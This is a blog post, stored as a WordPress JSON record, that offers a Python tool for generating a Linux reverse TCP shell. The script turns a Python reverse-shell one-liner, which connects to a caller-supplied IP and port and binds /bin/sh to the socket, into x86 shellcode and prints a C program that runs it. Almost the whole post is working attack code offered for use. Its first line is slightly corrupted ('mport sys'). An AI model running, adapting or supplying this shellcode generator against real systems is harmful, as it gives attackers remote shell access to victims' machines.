{"id":2517,"date":"2015-08-13T09:05:20","date_gmt":"2015-08-13T09:05:20","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2517"},"modified":"2015-08-13T09:05:20","modified_gmt":"2015-08-13T09:05:20","slug":"linux-reverse-tcp-shell-in-python","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2517","title":{"rendered":"Linux Reverse TCP Shell In Python"},"content":{"rendered":"<p>Python code that provides a reverse TCP shell.<br \/>\n<!--more--><\/p>\n<pre>mport sys\nimport re\n#Title :Linux ReverseTCPShell Shellcode via PythonCodes\n\"\"\"\n ___            _                             ___ \n| _ ) ___ _ __ | |__  ___ _ _ _ __  __ _ _ _ \/ __|\n| _ \\\/ _ \\ '  \\| '_ \\\/ -_) '_| '  \\\/ _` | ' \\\\__ \\\n|___\/\\___\/_|_|_|_.__\/\\___|_| |_|_|_\\__,_|_||_|___\/\n                _____               \n              |_   _|__ __ _ _ __  \n                | |\/ -_) _` | '  \\ \n                |_|\\___\\__,_|_|_|_|\nMembers:\n  Bomberman &gt; B3mB4m &lt; T-Rex\nShould I rest ? LOL.No fucking way..\nSo what you think we can convert python reverse shell directly shellcodes ? \nTested on : Ubuntu 14.04(x86)\nProof     : http:\/\/i.imgur.com\/kfWwU6x.png\nPython default path always some.So probably will works on all linux systems. \n\"\"\"\nclass B3mB4m(object):\n  def __init__(self):\n    self.command = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);''' % (str(sys.argv[1]), str(sys.argv[2]))\n    self.shellcode = r\"\\x31\\xff\\x6a\\x0b\\x58\\x99\\x57\"\n  def splitter(self, hexdump, pushword=\"None\"):\n    if pushword == \"None\":\n      fixmesempai = re.findall('....?', hexdump)\n      for x in fixmesempai[::-1]:\n        first = str(x[::-1].encode(\"hex\"))\n        second = re.findall(\"..?\", first)[::-1]\n        minilist = \"\"\n        for x in second:\n          minilist += r\"\\x%s\" % x    \n        self.shellcode += r\"\\x68%s\" % minilist\n    else:\n      first = str(x[::-1].encode(\"hex\"))\n      second = re.findall(\"..?\", first)[::-1]\n      for x in second:\n        minilist = \"\"\n        minilist += r\"\\x%s\" % x\n      self.shellcode += r\"\\x66\\x68\\x%s\" % minilist\n    self.shellcode += r\"\\x89\\xe6\\x52\\x66\\x68\\x2d\\x63\\x89\\xe1\\x52\\x68\\x74\\x68\\x6f\\x6e\"\n    self.shellcode += r\"\\x68\\x6e\\x2f\\x70\\x79\\x68\\x72\\x2f\\x62\\x69\\x68\\x2f\\x2f\\x75\\x73\"\n    self.shellcode += r\"\\xb0\\x0b\\x89\\xe3\\x52\\x56\\x51\\x53\\x89\\xe1\\xcd\\x80\"\n    self.shellcode =  'char *shellcode = \"%s\";' % self.shellcode\n    self.cplusplus()\n  def logo(self):\n    print \"\"\"\nAuthor : LOL.What you think ? \nGreetz : Itzik Kotler\n\"\"\";  \n  def cplusplus(self):\n    self.logo()#Let me do that for you ^_^\n    print \"\"\"  \n#include \n#include \n\/*Coded by B3mB4m\ngcc shell.c -o shell\n.\/shell *\/\n%s\nint main(void){\n  (*(void(*)()) shellcode)();}\\n\\n\"\"\" % (self.shellcode)\n  def testmystring(self):\n    if len(self.command)%4 != 0:\n      dwordpart = self.command[0:(len(self.command)-len(self.command)%4)]\n      wordpart = self.command[(len(self.command)-len(self.command)%4):len(self.command)]\n      self.splitter( dwordpart)\n      self.splitter(  wordpart, \"WordTime\")\n    else:\n      self.splitter( self.command)  \nif len(sys.argv) &lt; 2:\n  print \"Usage reverse.py IP PORT\"\n  sys.exit()\nelse:\n  B3mB4m().testmystring()\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Python code that provides a reverse TCP shell.<\/p>\n","protected":false},"author":1,"featured_media":2519,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[154,541],"tags":[352,149,331,542,543],"class_list":["post-2517","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pentesting-tools","category-python","tag-python","tag-rootkit","tag-shell","tag-tcp","tag-tool"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2517","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2517"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2517\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2517"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}